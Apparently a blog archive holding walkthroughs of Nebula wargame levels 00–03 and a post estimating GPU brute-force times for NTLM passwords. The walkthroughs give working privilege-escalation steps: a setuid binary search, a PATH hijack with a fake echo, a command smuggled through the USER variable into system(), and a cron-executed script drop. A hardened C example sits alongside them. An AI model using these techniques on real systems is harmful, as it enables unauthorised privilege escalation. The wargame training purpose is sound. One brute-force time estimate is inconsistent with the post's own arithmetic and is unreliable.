01 December 2012

Exploit.Exercise.com - Nebula - Level03

I decided to try my hand at a war game over at Exploit Exercises. I figured it was a good way to keep my mind sharp. Before reading my spoilers you should give them a try yourself.

I was surprised how easy this level was. According to Exploit Exercises, Nebula Level03:
"Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes."

Checking out writable.sh, we see
$ cat ../writable.sh
#!/bin/sh
for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done

This script executes everything within the directory writable.d, then deletes it.

Let's create a script for cron to execute for us inside the writable.d directory.
$ echo -e '#!/bin/bash\n/bin/getflag > /tmp/output.txt' > file.sh
$ chmod 700 file.sh

The output of the getflag command usually produces
$ getflag
getflag is executing on a non-flag account, this doesn't count

However, once cron executes our script, it creates a file output.txt with the output from the getflag command.

$ cat /tmp/output.txt 
You have successfully executed getflag on a target account

There we go!

19 August 2012

Exploit.Exercise.com - Nebula - Level02

I decided to try my hand at a war game over at Exploit Exercises. I figured it was a good way to keep my mind sharp. Before reading my spoilers you should give them a try yourself.

Level02 is similar to Level01 in that you don't need to know about C++ as much as you need to understand what is going on at the command line. You can see from the level02 code that it executes /bin/echo, which prints the $USER variable. So, let's change the $USER variable to execute our getflag command.

There are 3 different ways to chain Linux commands together. I chose to use the double ampersand (&&).
$ USER="foo && /bin/getflag"
$ export USER
$ ./flag02
about to call system("/bin/echo foo && /bin/getflag is cool")
foo
You have successfully executed getflag on a target account

There you have it!

If you are still hazy on why that worked, try this on your command line.
$ echo test1 && echo test2 && echo test3

18 August 2012

Exploit.Exercise.com - Nebula - Level01

I decided to try my hand at a war game over at Exploit Exercises. I figured it was a good way to keep my mind sharp. Before reading my spoilers you should give them a try yourself.

With level01 you don't need to know about programming in C++ as much as you do about how Linux calls binary commands. So, read the blurb over at Wikipedia about the $PATH variable. The whole point of how the $PATH variable affects Linux/Unix systems is that when a command needs to be executed, Linux/Unix needs to find where it is, and the $PATH variable specifies where to look.

So, skimming through the source code shown on Nebula level01, you'll see that the program runs the echo command, which prints out "and what now?". But remember what you read at Wikipedia about the $PATH variable? The only way to deliberately execute a command in a specific location is to give its path (e.g. ./). Therefore, as you can see from the source code, the echo command isn't being deliberately executed. It is found using the $PATH variable and executed from the first location where it is found. What if there was another echo command somewhere else that we could point the $PATH variable to? Perhaps an echo command that we created... that ran the getflag binary for us :)

To do this, we create a symbolic link from the command echo (that we created) to the target binary: 'getflag'.

First, make sure we are in /home/level01
$ cd ~
Now, create a soft symlink
$ ln -s /bin/getflag echo
Then export the $PATH to update it.
$ export PATH=/home/level01:$PATH
Make sure it worked
$ echo $PATH
Finally, run flag01
$ /home/flag01/flag01
You have successfully executed getflag on a target account
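As an added illustration of why level01 and level02 work (this is my own code, not Nebula's), here is the flag02-style system() call beside a hardened replacement that uses an absolute path, a fixed environment and no shell; echo_via_shell and echo_via_execve are names I chose, and the "exit 7 #" input is a constructed, harmless stand-in for the getflag payload.

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern, as in flag02: a caller-controlled string is spliced
 * into a shell command line, so /bin/sh interprets any && ; | it carries. */
int echo_via_shell(const char *who) {
    char cmd[256];
    snprintf(cmd, sizeof cmd, "/bin/echo %s is cool", who);
    int st = system(cmd);
    return (st == -1 || !WIFEXITED(st)) ? -1 : WEXITSTATUS(st);
}

/* Hardened version: no shell is involved, the program path is absolute
 * (so a PATH entry pointing at a fake echo is ignored, cf. level01), the
 * string is one argv element (so && is just text, cf. level02), and the
 * child gets a fixed minimal environment instead of the caller's. */
int echo_via_execve(const char *who) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = {"/bin/echo", (char *)who, "is cool", NULL};
        char *const envp[] = {"PATH=/usr/bin:/bin", NULL};
        execve("/bin/echo", argv, envp);
        _exit(127);                 /* only reached if exec failed */
    }
    int st;
    if (waitpid(pid, &st, 0) < 0) return -1;
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

int main(void) {
    const char *injected = "foo && exit 7 #";   /* constructed test input */
    /* shell: the injected 'exit 7' runs, status 7; execve: printed literally, status 0 */
    printf("shell:  exit status %d\n", echo_via_shell(injected));
    printf("execve: exit status %d\n", echo_via_execve(injected));
    return 0;
}
```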

13 August 2012

Exploit.Exercise.com - Nebula - Level00

I decided to try my hand at a war game over at Exploit Exercises. I figured it was a good way to keep my mind sharp. Before reading my spoilers you should give them a try yourself.

Level00 wants you to find a Set User ID program that is hidden in the filesystem. Level00 says that the SUID program runs as user 'flag00'.

The Linux command find works really well for this task.

The level00 documentation gives us two clues about the file. It is executable and it runs as the 'flag00' user. From looking at the man page, we know we can find files with those criteria.

Running this command
level00@nebula:~$ find / -user flag00 -executable -print
returns a bunch of permission errors.

So we run this to clean it up (send the errors to /dev/null)
level00@nebula:~$ find / -user flag00 -executable -print 2> /dev/null
/home/flag00
/bin/.../flag00

Checking out /home/flag00 doesn't seem to show anything interesting
level00@nebula:~$ ls -la /home/flag00
total 20
drwxr-x---  2 flag00 level00 4096 2011-11-20 20:21 .
drwxr-xr-x 43 root   root    4096 2011-11-20 20:21 ..
-rw-r--r--  1 flag00 flag00   220 2011-05-18 02:54 .bash_logout
-rw-r--r--  1 flag00 flag00  3353 2011-05-18 02:54 .bashrc
-rw-r--r--  1 flag00 flag00   675 2011-05-18 02:54 .profile

Let's check out
level00@nebula:~$ ls -la /bin/.../flag00
-rwsr-x--- 1 flag00 level00 7358 2011-11-20 21:22 /bin/.../flag00

There we go, it's executable and has the setuid bit set (the s in rwsr-x---). Let's try it out.
level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!

And finally we get what we came for...
level00@nebula:~$ getflag
You have successfully executed getflag on a target account
level00@nebula:~$

27 April 2012

The Brute Force Misconception

The Dream

Not long ago I was doing some research on the topic of brute forcing passwords. I was considering setting up a GPU farm to host a password cracking service.  Basically, people would submit password hashes and I would crack them.  For a price obviously. I envisioned making millions and getting government contracts.

Unfortunately I didn't get past the research and planning phase.

The Reality

Turns out that cracking a password takes forever, as in, longer than 10 minutes - and that makes it a poor business venture.  With the assistance of the fine gentleman over at Cryptohaze.com, I did some number crunching:

I wanted to crack NTLM (Windows).
I wanted to crack a full character space password - meaning all ASCII characters - which totals 95.
I wanted to crack a password that was at least 14 characters long.

Using Google Calculator I get: 95^14 = 4.87674979 × 10^27 password combinations.  If you attended 8th grade you should know that that is an enormous number.

"Alright fine." I thought. "I'll just get a ton of GPUs to assist me with the cracking."

An Nvidia 580 card can crack ~2B NTLM passwords / sec. What if I had 1024 cards cracking all at once?

Google Calculator tells me: (95^14) / (2,000,000,000 * 1024) = 2.38122548 × 10^15 seconds = 75,508,164.8 years.

Yeah, that is right about when my dream of striking it rich went out the window.

The Misconception?

Everybody knows that brute forcing passwords takes a long time, so you are probably wondering why I titled this article The Brute Force Misconception. Here's why:  in the last year or so password cracking has made huge leaps and bounds in terms of cracking speed. This can all be credited to the CUDA programming language allowing access to the massively parallel Nvidia GPU. People have written programs that dramatically reduce the amount of time it takes to crack a password.  However, even a 10 character password would take nearly a year to crack. Doh!  Well, 1 year is less than 10,000, but still 1 year is a long time.

Granted, an 8 character password takes about a minute (with 1024 Nvidia 580's). However, 10 character passwords are becoming more and more common. AND who has a 1024 GPU farm setup?

In Closing

Weak passwords are easy to crack. That's a no brainer. But brute forcing passwords still takes too long. Don't buy expensive GPU password cracking programs:
http://www.insidepro.com/eng/egb.shtml
http://www.elcomsoft.com/distributed_password_recovery.html

You'll be dead and gone before your password is spit out in clear text.

Extra Notes

- Use LastPass - it's awesome.
- Check out Cryptohaze.com - it is an incredible GPU password cracker (with networking capabilities).
- Check out AtlasFolding.com if you are thinking of putting together a small GPU farm.